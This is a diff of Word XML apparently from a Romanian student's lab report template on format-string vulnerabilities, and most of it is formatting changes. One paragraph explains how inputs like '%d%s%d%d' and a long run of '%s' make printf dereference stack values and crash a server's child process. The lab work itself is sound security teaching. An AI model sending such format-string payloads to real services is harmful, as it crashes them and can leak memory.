+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
         <w:rPr/>
       </w:pPr>
       <w:r>
@@ -804,6 +1496,7 @@
           <w:ilvl w:val="1"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:jc w:val="both"/>
         <w:rPr/>
       </w:pPr>
       <w:r>
@@ -814,6 +1507,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
         <w:rPr/>
       </w:pPr>
       <w:r>
@@ -827,9 +1521,8 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -851,6 +1544,119 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
@@ -868,9 +1674,8 @@
           <w:ilvl w:val="1"/>
           <w:numId w:val="1"/>
         </w:numPr>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -883,6 +1688,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:ind w:left="1080" w:hanging="0"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
@@ -900,9 +1706,8 @@
           <w:ilvl w:val="1"/>
           <w:numId w:val="1"/>
         </w:numPr>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -914,6 +1719,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
@@ -931,9 +1737,8 @@
           <w:ilvl w:val="1"/>
           <w:numId w:val="1"/>
         </w:numPr>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -945,6 +1750,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
@@ -962,9 +1768,8 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -976,6 +1781,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
@@ -993,9 +1799,8 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1007,6 +1812,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
@@ -1024,9 +1830,8 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1038,6 +1843,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
@@ -1053,6 +1859,7 @@
         <w:pStyle w:val="Heading3"/>
         <w:spacing w:before="240" w:after="60"/>
         <w:ind w:left="1170" w:hanging="810"/>
+        <w:jc w:val="both"/>
         <w:rPr/>
       </w:pPr>
       <w:r>
@@ -1060,7 +1867,7 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId6"/>
+      <w:headerReference w:type="default" r:id="rId9"/>
       <w:type w:val="nextPage"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:left="1440" w:right="1440" w:header="720" w:top="777" w:footer="0" w:bottom="1440" w:gutter="0"/>
@@ -1391,6 +2198,143 @@
   <w:abstractNum w:abstractNumId="3">
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1080"/>
+        </w:tabs>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2520"/>
+        </w:tabs>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3240"/>
+        </w:tabs>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
       <w:numFmt w:val="none"/>
       <w:suff w:val="nothing"/>
       <w:lvlText w:val=""/>
@@ -1515,6 +2459,9 @@
   </w:num>
   <w:num w:numId="3">
     <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="4"/>
   </w:num>
 </w:numbering>
 </file>

--- a/L02/SablonRaportL02.docx
+++ b/L02/SablonRaportL02.docx
@@ -64,13 +64,7 @@
         <w:rPr>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-        <w:t>Birlutiu Claudiu-Andrei</w:t>
+        <w:t>: Birlutiu Claudiu-Andrei</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -397,11 +391,7 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t xml:space="preserve">atacul la nivelul codului prin inserarea unui string de tipul „%d%s%d%d” prin care se va accesa o zona invalida de pe stiva =&gt; duce la craparea; -la procent %s printf va accesa o zona invalida de memorie deaorece va trata valoare de pe stiva ce adresa; programului și nu se va afisa fetele zambarete; sau %s%s%s%s%s%s%s%s%s%s%s%s – programul va crapa deoarece pentru fiecare %s, functia va trata valoarea ca adresa și extrage date de la adresa respectiva </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>=&gt; una dintre valorile de la acele adresa fiind invalida va duce la craprea programului</w:t>
+        <w:t>atacul la nivelul codului prin inserarea unui string de tipul „%d%s%d%d” prin care se va accesa o zona invalida de pe stiva =&gt; duce la craparea; -la procent %s printf va accesa o zona invalida de memorie deaorece va trata valoare de pe stiva ce adresa; programului și nu se va afisa fetele zambarete; sau %s%s%s%s%s%s%s%s%s%s%s%s – programul va crapa deoarece pentru fiecare %s, functia va trata valoarea ca adresa și extrage date de la adresa respectiva =&gt; una dintre valorile de la acele adresa fiind invalida va duce la craprea programului</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -447,29 +437,7 @@
           <w:spacing w:val="0"/>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
-        <w:t xml:space="preserve"> bloca</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
-          <w:caps w:val="false"/>
-          <w:smallCaps w:val="false"/>
-          <w:spacing w:val="0"/>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-        <w:t xml:space="preserve">t, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
-          <w:caps w:val="false"/>
-          <w:smallCaps w:val="false"/>
-          <w:spacing w:val="0"/>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> programul </w:t>
+        <w:t xml:space="preserve"> blocat,  programul </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -492,51 +460,7 @@
           <w:spacing w:val="0"/>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
-        <w:t xml:space="preserve"> care a e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
-          <w:caps w:val="false"/>
-          <w:smallCaps w:val="false"/>
-          <w:spacing w:val="0"/>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
-          <w:caps w:val="false"/>
-          <w:smallCaps w:val="false"/>
-          <w:spacing w:val="0"/>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-        <w:t>uat ruleaz</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
-          <w:caps w:val="false"/>
-          <w:smallCaps w:val="false"/>
-          <w:spacing w:val="0"/>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-        <w:t>a i</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
-          <w:caps w:val="false"/>
-          <w:smallCaps w:val="false"/>
-          <w:spacing w:val="0"/>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-        <w:t>ntr-un proces copil generat de programul server</w:t>
+        <w:t xml:space="preserve"> care a esuat ruleaza intr-un proces copil generat de programul server</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -996,11 +920,7 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t xml:space="preserve">provocarea lansata in cadrul acestei sarcini se refera la afisarea primilor 4 octeti transmisi ca input; </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>Vom lua 3 numere cu valoarea pentru a fi mai usor de a identifica seceventa de octeti. Scopul nostru e de identifica number1 (are 4 octeti)</w:t>
+        <w:t>provocarea lansata in cadrul acestei sarcini se refera la afisarea primilor 4 octeti transmisi ca input; Vom lua 3 numere cu valoarea pentru a fi mai usor de a identifica seceventa de octeti. Scopul nostru e de identifica number1 (are 4 octeti)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1171,7 +1091,7 @@
             <wp:positionV relativeFrom="paragraph">
               <wp:posOffset>635</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="5943600" cy="5355590"/>
+            <wp:extent cx="5943600" cy="6012815"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
             <wp:docPr id="7" name="Image7" descr=""/>
@@ -1196,7 +1116,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="5355590"/>
+                      <a:ext cx="5943600" cy="6012815"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1261,236 +1181,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading3"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
@@ -1507,11 +1197,742 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
